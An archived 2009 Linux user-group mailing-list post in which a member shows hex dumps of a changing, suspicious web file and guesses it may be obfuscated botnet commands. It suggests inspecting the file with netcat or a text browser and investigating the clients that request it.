[SATLUG] Strange file.

Jon Mark Allen jm at allensonthe.net
Tue Jan 13 16:27:02 CST 2009


> it looks as if someone set that up with exploit code... maybe. See what it does on Winblows. You may have averted an attack by uing Linux.
> _________________________________________________________________

The file is different each time it's accessed.

xxd tmp/strange-file.txt 
0000000: 2020 2045 4569 442d 2a3c 5e32 4f50 3a6f     EEiD-*<^2OP:o
0000010: 4b75 2074 6537 2863 2948 2a75 697e 7e2a  Ku te7(c)H*ui~~*
0000020: 492e 2b45 2e25 7941 2e5d 6e6f 513b 7f43  I.+E.%yA.]noQ;.C
0000030: 5552 2762 2e75 2e6a 4355 524e 2d61 3526  UR'b.u.jCURN-a5&
0000040: 5978 502a 2033 2f34 497c 320a 2020 202a  YxP* 3/4I|2.   *
0000050: 4561 202e 656e 6560 612a 2c49 7525 4f79  Ea .ene`a*,Iu%Oy
0000060: 5522 652d 632d 505e 332a 4f2f 4121 5e31  U"e-c-P^3*O/A!^1
0000070: 3e3e 2a4c 5920 332f 342a 2a7c 4f2a 2a4f  >>*LY 3/4**|O**O
0000080: 2059 454e 745b 2c2a 3c77 2d6f 5d20 4145   YENt[,*<w-o] AE
0000090: 0a20 2020 332f 342f 5730 2e41 3f44 7958  .   3/4/W0.A?DyX
00000a0: 5b45 252e 553a 2e2d 2e41 5448 4e54 772e  [E%.U:.-.ATHNTw.
00000b0: 5945 4e2a 5235 3770 2e2a 3879 4e6d 2e4f  YEN*R57p.*8yNm.O
00000c0: 4544 4041 4559 5a2e 2a43 2c59 413a 5c5e  ED at AEYZ.*C,YA:\^
00000d0: 324f 2f73 3141 3a77 533a 452e 3e3e 4141  2O/s1A:wS:E.>>AA
00000e0: 792a 2e2a 6e2d 632d 5d3a 2a2a 2a2e 4861  y*.*n-c-]:***.Ha
00000f0: 3a2e 752e 6549 2a36 284e 6e6e 0a20 2020  :.u.eI*6(Nnn.   
0000100: 312f 322a 444f 4861 252a 6f2e 6945 4145  1/2*DOHa%*o.iEAE
0000110: 6f41 2852 2971 5f55 3a69 2a6f 2031 2f32  oA(R)q_U:i*o 1/2
0000120: 2e40 4c2e 5945 4e41 2e69 263a 2e49 2d6f  . at L.YENA.i&:.I-o
0000130: 2a75 5448 2a58 5749 716f 2f2a 2c45 2a4a  *uTH*XWIqo/*,E*J
0000140: 2e79 2a3e 3e2e 4a6b 3b0a 2020 2031 2f32  .y*>>.Jk;.   1/2
0000150: 3f2e 4145 6160 6b49 572f 7554 6e20 3532  ?.AEa`kIW/uTn 52
0000160: 6f6c 2e3d 4145 2e55 4b6d 2d4c 2d63 626f  ol.=AE.UKm-L-cbo
0000170: 4c6b 7437 2e69 2a7c 6f69 2a49 542e 6061  Lkt7.i*|oi*IT.`a
0000180: 6069 214e 2a2a 642d 6b78 2a54 6573 732e  `i!N**d-kx*Tess.
0000190: 2a45 204e 4234 2e0a 2020 202a 2e35 4941  *E NB4..   *.5IA
00001a0: 2a46 5e32 2a20 202a 3841 5420 312f 322d  *F^2*  *8AT 1/2-
00001b0: 6143 5552 6b55 3a48 6349 4968 6175 212a  aCURkU:HcIIhau!*
00001c0: 2a0a                                     *.


xxd tmp/strange-file2.txt 
0000000: 2020 2055 3a44 4547 4220 6147 2e74 5945     U:DEGB aG.tYE
0000010: 4e4f 2a2e 223e 3e63 2c2a 6f2f 7c2a 2a2e  NO*.">>c,*o/|**.
0000020: 7b2f 642d 4c2a 2e20 632c 4f77 2a0a 2020  {/d-L*. c,Ow*.  
0000030: 202e 2a74 632c 4d44 6d2a 454f 4445 4779   .*tc,MDm*EODEGy
0000040: 4166 3627 5448 2e62 2a75 2f4c 2d6f 557e  Af6'TH.b*u/L-oU~
0000050: 2e49 4141 6932 4d59 652a 4e4f 5479 556f  .IAAi2MYe*NOTyUo
0000060: 3c7d 765c 2a4f 2a23 4b0a 2020 202a 7764  <}v\*O*#K.   *wd
0000070: 2d42 2a6f 5570 2e3a 6f2f 6f2a 2a2d 4c2d  -B*oUp.:o/o**-L-
0000080: 6f3a 2143 5552 6551 5232 6f7c 7373 3243  o:!CUReQR2o|ss2C
0000090: 2c59 454e 5e32 2a69 2e5c 2545 3b43 6169  ,YEN^2*i.\%E;Cai
00000a0: 6160 6941 4559 2a4a 5f69 6f3a 4b61 6141  a`iAEY*J_io:KaaA
00000b0: 0a20 2020 332f 342e 2a7a 2d61 412a 2a2e  .   3/4.*z-aA**.
00000c0: 2a49 6e4f 2f27 7141 522a 6161 4e4e 4f54  *InO/'qAR*aaNNOT
00000d0: 3f4d 754e 4525 642d 4c2d 4771 6f2f 2e48  ?MuNE%d-L-Gqo/.H
00000e0: 2a2a 6875 3e47 2e71 2a2f 2161 212a 4f2f  **hu>G.q*/!a!*O/
00000f0: 204f 2f56 4775 3a54 6f2e 2e4f 0a20 2020   O/VGu:To..O.   
0000100: 782a 7546 7464 2d0a                      x*uFtd-.


xxd tmp/strange-file3.txt 
0000000: 2020 2041 452a 4575 3c2e 7c2e 2a74 6855     AE*Eu<.|.*thU
0000010: 4a2e 2e61 2a2e 4155 4979 703a 287b 2a2a  J..a*.AUIyp:({**
0000020: 2065 3c3c 2a3a 2c65 212a 407c 5e32 2e4e   e<<*:,e!*@|^2.N
0000030: 4f54 672e 0a20 2020 413a 2a2d 632d 532e  OTg..   A:*-c-S.
0000040: 462e 2e2e 2034 3b65 4f3a 4965 2e47 4445  F... 4;eO:Ie.GDE
0000050: 4779 752a 202e 2c2a 617b 542a 5b2e 2e2d  Gyu* .,*a{T*[..-
0000060: 4145 2a55 3a2a 314e 2e7f 612e 4e2a 797b  AE*U:*1N..a.N*y{
0000070: 2031 2f34 4445 4722 2a0a 2020 202a 4144   1/4DEG"*.   *AD
0000080: 4547 552e 2a2a 452e 2852 296e 572e 476f  EGU.**E.(R)nW.Go
0000090: 495e 6f21 7c55 3a6f 7a65 5e31 2e74 6d43  I^o!|U:oze^1.tmC
00000a0: 2c4f 583e 3e79 2a77 6d75 2e45 552e 720a  ,OX>>y*wmu.EU.r.
00000b0: 2020 2031 2f34 2e2c 512b 4966 556f 2f28     1/4.,Q+IfUo/(
00000c0: 4449 2e6f 3f2d 2e2a 6f75 432c 2d6f 4961  DI.o?-.*ouC,-oIa
00000d0: 6061 324b 2b2d 2a2e 7468 683b 482a 3a27  `a2K+-*.thh;H*:'
00000e0: 752e 553a 5448 2a27 742e 6359 2e5a 2a4a  u.U:TH*'t.cY.Z*J
00000f0: 4141 4f2a 0a20 2020 312f 322e 4f3a 6c41  AAO*.   1/2.O:lA
0000100: 2a2d 614f 5564 2d2d 7c2e 7e2e 2044 5637  *-aOUd--|.~. DV7
0000110: 5061 614f 7561 6576 2e2e 653f 652e 2d4c  PaaOuaev..e?e.-L
0000120: 2d2a 6f61 3820 312f 320a 2020 202e 7444  -*oa8 1/2.   .tD
0000130: 4547 3e3e 367e 4941 3265 2a2a 5d65 2e2a  EG>>6~IA2e**]e.*
0000140: 5c2a 446f 552a 2d4c 2d41 4549 2a3e 3c3c  \*DoU*-L-AEI*><<
0000150: 2a61 6575 692a 5448 2879 5c28 2a55 3a41  *aeui*TH(y\(*U:A
0000160: 2a4f 6978 2a49 2e69 2a49 7468 7b77 2e5d  *Oix*I.i*Ith{w.]
0000170: 753a 672e 2a2a 6970 2d63 2d5c 5c2a 2a6f  u:g.**ip-c-\\**o
0000180: 5448 2a32 6161 612a 652e 2e32 632c 0a20  TH*2aaa*e..2c,. 
0000190: 2020 2a2e 3c3c 2a61 3a20 332f 342a 753a    *.<<*a: 3/4*u:
00001a0: 644f 2e20 312f 324e 202d 6173 730a       dO. 1/2N -ass.


Probably some sort of obfuscated CC Bot commands would be my guess.

I for one wouldn't access it with a standard browser at all.

Try netcat or links2 (with -dump option)

Anyway you look at it, I would do some serious investigation on the
clients that are accessing that URI.

Jon Mark



More information about the SATLUG mailing list